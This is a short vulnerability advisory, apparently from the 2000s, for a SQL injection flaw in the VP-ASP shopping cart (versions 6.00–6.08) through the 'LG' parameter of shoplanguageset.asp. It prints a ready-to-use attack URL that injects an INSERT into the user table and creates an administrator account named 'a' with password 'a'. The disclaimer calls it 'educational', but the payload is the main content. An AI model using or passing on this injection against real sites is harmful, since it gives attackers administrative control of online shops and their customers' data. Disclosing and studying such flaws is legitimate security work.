VP-ASP 6.00-6.08? SQL Injection / Exploit by tracewar(tracewar@gmail.com)

I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.

* this information is for educational purposes only!

* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.

OK for the guys at vp-asp, 
you should choose a different coding language for your shopping cart :(

I'm tired of writing vp-asp advisories 24/7 untill you guys release version 7.00
and take the security issue serious, I'm not going to audit your code anymore.

----- THE BUG:

the bug exists in the shoplanguageset.asp file under the "LG" query:
I didn't have a normal vp-asp shopping cart for testings but this hack should work:

add user a/a just like the old one:

/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

-tracewar